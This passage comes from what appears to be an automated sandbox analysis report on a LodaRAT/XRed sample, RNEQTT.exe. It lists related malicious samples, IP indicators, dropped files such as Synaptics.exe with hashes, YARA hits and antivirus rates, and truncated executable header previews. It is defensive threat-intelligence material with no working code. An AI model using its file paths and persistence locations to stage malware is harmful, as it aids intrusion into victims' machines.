                                                                                                                                                        http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 151.101.2.137
                                                                                                                                                        eCompleted_419z.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 151.101.2.137
                                                                                                                                                        https://property-management-portal.replit.app/%2520%2522https:/property-management-portal.replit.app/%2522Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 151.101.2.208
                                                                                                                                                        https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                                                        • 151.101.2.137

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97
                                                                                                                                                        installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.199.108.133
                                                                                                                                                        • 142.250.181.14
                                                                                                                                                        • 142.250.181.97

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\ProgramData\Synaptics\Synaptics.exeRNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exeRNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                            C:\ProgramData\Synaptics\RCX4F1F.tmpRNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):118
                                                                                                                                                              Entropy (8bit):3.5700810731231707
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                              C:\ProgramData\Synaptics\RCX4F1F.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):771584
                                                                                                                                                              Entropy (8bit):6.629891194746731
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                                                              MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                              SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                                                              SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                                                              SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                              C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1688576
                                                                                                                                                              Entropy (8bit):7.451847174682131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:MnsHyjtk2MYC5GDshloJfxBHUklI7GkBf:Mnsmtk2a5hliBHUklI66f
                                                                                                                                                              MD5:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                              SHA1:55E2550CE27991E708E30A2E75253093EED0EDB3
                                                                                                                                                              SHA-256:6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                                                                                                                                              SHA-512:F8013FB625BB6354B50D7C27331C3088904DDD9103E0B28BAC8965EDD83D86353250E97AA872B82756D2765064D5BE30E9E9579E216805C12216634627311A86
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................$....................@.......................... ...................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1688576
                                                                                                                                                              Entropy (8bit):7.451847174682131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:MnsHyjtk2MYC5GDshloJfxBHUklI7GkBf:Mnsmtk2a5hliBHUklI66f
                                                                                                                                                              MD5:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                              SHA1:55E2550CE27991E708E30A2E75253093EED0EDB3
                                                                                                                                                              SHA-256:6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                                                                                                                                              SHA-512:F8013FB625BB6354B50D7C27331C3088904DDD9103E0B28BAC8965EDD83D86353250E97AA872B82756D2765064D5BE30E9E9579E216805C12216634627311A86
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................$....................@.......................... ...................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\31a5Fe4.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.248097462190004
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                              MD5:A506B5208FBFCE8648CEA8BC8260B01A
                                                                                                                                                              SHA1:328FCE82E8B27EA2D85935EF87FD19936CDE7BC7
                                                                                                                                                              SHA-256:8EBFA93ECD2E70D40E01DC3A3300F5D74F901F1DDE917877620D6BE5541B01F1
                                                                                                                                                              SHA-512:03AAB0ACD0673406EA4023D36F6BB633EFB375DAFE9A565397C22AC68ECFE489639F47A93C593A9624A662F57955AB8A0CA2908F0A05C930A0E7399FEE66FD64
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gAlzxn_oD2DTM2nsxZ-Xgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\32pAPMdc.xlsm

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18387
                                                                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\35jXIS8.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.269599946472833
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                              MD5:1C1123BEAA489534747E322B76608076
                                                                                                                                                              SHA1:4F8F0B7070C0DA11E92231700A107C96CC710380
                                                                                                                                                              SHA-256:04B19C8DF60CDDFF407BD95A9FB7D56D9476058C1B7CF33F81F0D5232D8FA64E
                                                                                                                                                              SHA-512:5EBEEBF45C48C333CE25380C7B156E5350E933DCD37174F82340B091326BF095541902B81DB1AF0A59F08A91B0ED67E530374F192024C463A5294FC2D9C1C086
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PCREBxjjI9828Khp-c63bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\4OA6BPo.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.269558908008821
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0hibSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Fb+pAZewRDK4mW
                                                                                                                                                              MD5:FC6FB3D68D756BE3CCA1910398ECB45D
                                                                                                                                                              SHA1:2D15C0861F74C035E48E5F6D4FE54BB9CCF00304
                                                                                                                                                              SHA-256:EF8FD9213FC01A87133A9A06F71A64F9AC30E0A14AA344C4C32F2BCF3D727A45
                                                                                                                                                              SHA-512:F167F2F3D596F6C0B829C9B713131ECAFC1B51243F37D472245199492C3CFFACC10D570E15DADBA82D3AADD27E2A97D78924B2E9E57542657510835311883842
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wWBq5PPnjImK-kJQor_DXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\8TL7zmL.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.255957907722911
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                                              MD5:D9745C2943534A0CCE8B86150FC2D873
                                                                                                                                                              SHA1:5EB3532CEDF625237E2B192E81E1C6DC83D24D16
                                                                                                                                                              SHA-256:84BDE1799450ABDEE4D2950584D96E002E94A88D98B88286A1A78777285B9509
                                                                                                                                                              SHA-512:FCF5CC1EED6D0E54865D8C908B96284CC8BA014F20C2B2150E83AD6D984527076F518304BD8F7B485EA1600715A54B00BCBF1E8823E5321964E25A2725284E0F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jxKZp6o4pzWao17pS02FSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\FK6CaLe.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.260473418495811
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                                                              MD5:3BE7E8B19797120A2F76B91AEEE186BA
                                                                                                                                                              SHA1:BFDDB0C8BF7366A36965E32F889E51D81918C311
                                                                                                                                                              SHA-256:3C53A0F2CDB0C84280F379545A59CAA25FF7C6AEDE0E907E6A5CF3E39ACBA5A6
                                                                                                                                                              SHA-512:0F68557781C35250336186AA927708EE87B802B09E06F61A4C4A20A1A650A89FF81434E327D72D5DD9D83E8C4CE380A2B85B92A5F764C8D4BEE9B55DB9C70262
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KNo7LbmJ0SuhQ9fPa9R6og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\KHZdfXa.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.275478260150864
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0yGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                                                              MD5:E47E8CD671547BE46A97DC6D4F5C9D25
                                                                                                                                                              SHA1:6F16170AB52D6BDA82D223D437D74455C369005C
                                                                                                                                                              SHA-256:B911339BA12637EF0A41AB57566055C563397E1A97A4DC1FFD17AA97551620DC
                                                                                                                                                              SHA-512:24DCE86BBE1AD672BE0CFBBBC1DF0C54F7D389F70232DC2C49EA6DC21B40D400DB25E6F5AA3EEFC7BA31388664005974B39BD6538394D2F94173214ABBBB9746
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q7MImRDYGrjYsAmW9B0WIw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Pb8GUjl.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.252839256708489
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0s1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N1+pAZewRDK4mW
                                                                                                                                                              MD5:71E0B201F5E565910D4F0410B17BAB01
                                                                                                                                                              SHA1:C40F3C88BFCD21EDA83D76836BBE41CBB540997A
                                                                                                                                                              SHA-256:9035589F49D6E576452C0989A214F711F932DF9B2CD8387C7EB84B032B74EE8E
                                                                                                                                                              SHA-512:45AE738B6D5BC101AAF1C13E415DE0E2BCAA18977A3CF30832765E953705F6F1EE4A64F099E26FB8646679B16C6BB1A8C925154AB81F42366298CEB32E4A2ADF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JkthBepycmSVriza2KMhRw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\QyIjfzD.ini

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.253803825870797
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                                                              MD5:2AF71B388A204D1C93336EC5B98C5AA1
                                                                                                                                                              SHA1:37EA627C6B561BCC6D15DFA8D237229E5B96A30C
                                                                                                                                                              SHA-256:EA90D265C5DBD15503369868FDE583B78D9EE51AFAADE7B7F211BA69BD6986BB
                                                                                                                                                              SHA-512:B0571098D66E9D678DEAE76D717232F625991EEFA61B117C6F485B3A47B7E2615A88E262C191F52479EC6F806F42BA3A5ED7336290B8DA1FD25ACA1F0BC69999
                                                                                                                                                              Malicious:false
